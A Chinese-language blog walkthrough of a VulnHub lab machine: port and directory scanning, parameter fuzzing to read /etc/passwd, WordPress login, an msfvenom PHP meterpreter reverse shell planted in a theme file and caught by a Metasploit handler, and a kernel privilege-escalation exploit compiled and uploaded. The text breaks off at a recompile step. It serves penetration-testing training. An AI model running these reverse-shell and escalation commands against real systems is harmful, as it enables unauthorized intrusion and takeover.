[渗透测试实战]vulnhub靶场1 初步掌握渗透流程（详细步骤）

最新推荐文章于 2024-07-23 14:28:07 发布

雁过留声9527

最新推荐文章于 2024-07-23 14:28:07 发布

阅读量1.9k

点赞数 2

分类专栏：渗透测试实践文章标签：网络安全

本文链接： https://blog.csdn.net/qq_42933340/article/details/131492774

版权

渗透测试实践专栏收录该内容

1 篇文章 1 订阅

订阅专栏

文章目录

靶机地址

实验目的：掌握渗透测试基本流程和渗透工具

涉及渗透工具知识点：

dirb 扫描web路径
fuzz获取url正确参数名
msf漏洞检索和利用
WordPress上传文件漏洞，反弹

已知渗透信息：

靶机安装在vmvare虚拟机中，使用NAT模式，网段192.168.31.0/24中

攻击主机:kali linux主机

渗透目的：

进入系统，获取靶机flag

1.主机发现，确定攻击目标

nmap方式（也可用命令行）得到主机ip:192.168.31.100,真实渗透环境肯定扫描出多个主机，需要收集多种渗透信息，分别

2.端口发现，寻找突破口

#对全端口扫描
nmap -p 1-65535 -T4 -A -v 192.168.31.100

3.web渗透

根据扫描出的服务，从易入侵的web服务开始继续渗透

遇到web有什么渗透思路：

目录扫描
请求参数fuzz
尝试访问敏感文件robots.txt
用户名和密码爆破
看网页源码(看有没有信息可利用)

在信息安全领域中，Fuzzing（模糊测试）是一种常用的黑盒测试技术，也是信息收集的一种方法之一。Fuzzing通过向目标系统输入大量随机数据来测试系统的鲁棒性和安全性。Fuzz测试通常涉及构建一个能够生成大量随机数据的程序，然后将这些数据发送到目标系统或应用程序中，以发现潜在的漏洞或错误。

在信息收集中，Fuzzing通常用于测试网络服务或应用程序的漏洞和弱点。通过向目标服务器发送各种类型的随机数据，可以发现一些潜在的漏洞和安全问题，例如缓冲区溢出、拒绝服务攻击、SQL注入等。Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点，因为它可以测试系统的响应能力，以及处理异常数据的能力。

总之，Fuzzing是一种非常有用的信息收集技术，可以帮助安全专业人员发现潜在的安全问题和漏洞。但需要注意的是，Fuzzing可能会导致目标系统崩溃或不稳定，因此在实施Fuzzing时需要谨慎，并遵循相关的道德和法律规范。

dirb扫描web目录

└─# dirb http://192.168.31.100/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul  1 00:37:21 2023
URL_BASE: http://192.168.31.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.31.100/ ----
+ http://192.168.31.100/dev (CODE:200|SIZE:131)                                                                                                  
+ http://192.168.31.100/index.php (CODE:200|SIZE:136)                                                                                            
==> DIRECTORY: http://192.168.31.100/javascript/                                                                                                 
+ http://192.168.31.100/server-status (CODE:403|SIZE:279)                                                                                        
==> DIRECTORY: http://192.168.31.100/wordpress/                                                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/javascript/ ----
==> DIRECTORY: http://192.168.31.100/javascript/jquery/                                                                                          
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/ ----
+ http://192.168.31.100/wordpress/index.php (CODE:301|SIZE:0)                                                                                    
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/                                                                                         
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/                                                                                       
==> DIRECTORY: http://192.168.31.100/wordpress/wp-includes/                                                                                      
+ http://192.168.31.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/javascript/jquery/ ----
+ http://192.168.31.100/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                                          
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/ ----
+ http://192.168.31.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                           
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/css/                                                                                     
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/images/                                                                                  
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/includes/                                                                                
+ http://192.168.31.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                           
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/js/                                                                                      
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/maint/                                                                                   
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/network/                                                                                 
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/user/                                                                                    
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/ ----
+ http://192.168.31.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                         
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/plugins/                                                                               
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/themes/                                                                                
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/uploads/                                                                               
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/network/ ----
+ http://192.168.31.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                   
+ http://192.168.31.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/user/ ----
+ http://192.168.31.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                      
+ http://192.168.31.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                      
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/plugins/ ----
+ http://192.168.31.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                 
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/themes/ ----
+ http://192.168.31.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.31.100/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Jul  1 00:38:39 2023
DOWNLOADED: 46120 - FOUND: 15

web内容扫描中得出，此靶机对外提供wordpress服务，通过访问url路径得到几个有用路径信息：

http://192.168.31.100/dev (CODE:200|SIZE:131)
==> DIRECTORY: http://192.168.31.100/wordpress/

给出了提示：用fuzz工具和找出正确参数，接着传入参数值location.txt继续下一步

fuzz获取正确url参数

fuzz的用法：

找到url参数
sql注入
密码暴力破解
绕过waf

#用参数字典访问网站，得到返回状态码、行数、字符数等统计信息，在统计信息中找出不同于其它的访问结果，拿到正确的参数
#第一遍访问获取请求返回统计信息
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt  http://192.168.31.100/index.php?FUZZ
#第二遍访问通过参数过滤出不同与其它哪项,参数 --hw 12 从第一次访问中等到返回字数12
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt  --hw 12 http://192.168.31.100/index.php?FUZZ

找到正确参数file，根据提示访问

拿到正确参数，需要传入参数访问url拿到系统信息，参数file是文件的意思，第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。

根据提示得到关键字“follow_the_ippsec”，哪这个关键字和什么有关？目前已知系统提供的服务ssh和http，web用的是WordPress cms系统，渗透系统希望获得用户和密码，访问WordPress看能不能得到账户信息

WordPress漏洞利用

获取wordpress用户名

**方式一：**经验获取用户名

WordPress搭建成功后自动发布一封有用户名的文章，因此得到wordpress登录用户名为victor

尝试用账户和关键词密码发现可以登录：

接下来就针对WordPress渗透发现侵入系统的漏洞

方式二：指纹工具获取WordPress用户

关于WordPress的指纹工具

wpscan

cmseek

cmseek安装：

apt-get update

apt-get install -y cmseek

wpscan枚举WordPress用户也得到用户victor

#枚举WordPress用户完整输出

# wpscan --url http://192.168.31.100/wordpress -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.31.100/wordpress/ [192.168.31.100]
[+] Started: Sat Jul  1 01:32:10 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.31.100/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.31.100/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.31.100/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.31.100/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.31.100/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
 |  - http://192.168.31.100/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] victor
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jul  1 01:32:12 2023
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 16.91 KB
[+] Data Received: 20.512 MB
[+] Memory used: 168.305 MB
[+] Elapsed time: 00:00:02

4.文件上传，反弹连接

登录进入后，如何开始WordPress渗透？

文件上传漏洞

生成反弹连接脚本：

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=6666 -o shell.php

在wordpress中利用主题编辑功能对当前主题编辑，找到可编辑的php文件（图中如secret.php)，然后粘贴上述生成的反弹连接php

在kali linux 中用msfconsole命令启动监听6666的任务

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.31.101
lhost => 192.168.31.101
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit

当访问

http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/secret.php (这是主题访问路径文件访问方式，记得路径就行，这是WordPress目录结构规范)

到此可以执行在目标机器上执行一部分命令，通过sysinfo命令得知系统版本时ubuntu16.04.2

5.msf提权

接下来就是提权操作，执行更多命令

提权思路：

如下演示通过msf操作系统漏洞数据库，漏洞利用获取权限

msfconsole 中执行：

searchsploit 16.04 Ubuntu

根据内核版本得到可利用的漏洞，编译漏洞利用程序：

/usr/share/exploitdb/exploits/linux/local/45010.c

并上传靶机可执行路径/tmp下，执行即可提权

在kali-linux 上编译提权程序

cp /usr/share/exploitdb/exploits/linux/local/45010.c /root
cd /root
gcc 45010.c -o 45010   # 由于gcc版本问题，编译后在靶机上执行会报错，见下面解决

msconsole中执行：

upload上传
shell中执行45010提权程序

执行报错：./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34’ not found (required by ./45010)

解决gcc编译版本问题：

通过反弹shell查看靶机glibc版本：

ldd --version

在kali-linux上

apt-get install -y autoconf
git clone https://github.com/NixOS/patchelf.git
cd patchelf
./bootstrap.sh 
./configure
make
make check
sudo make install

PatchELF是一个简单的实用程序，用于修改现有的ELF可执行文件和库。具体而言，它可以执行以下操作：
更改可执行文件的动态加载程序（“ELF 解释器”）：
$ patchelf --set-interpreter /lib/my-ld-linux.so.2 my-program
更改可执行文件和库 RPATH ：
$ patchelf --set-rpath /opt/my-libs/lib:/other-libs my-program
缩小可执行文件和库 RPATH ：
$ patchelf --shrink-rpath my-program

通过glibc-all-in-one库下载靶机对应版本gcc编译环境：

gcc -Wl,-rpath='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64',-dynamic-linker='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-linux-x86-64.so.2' -s  45010.c -o 45010V2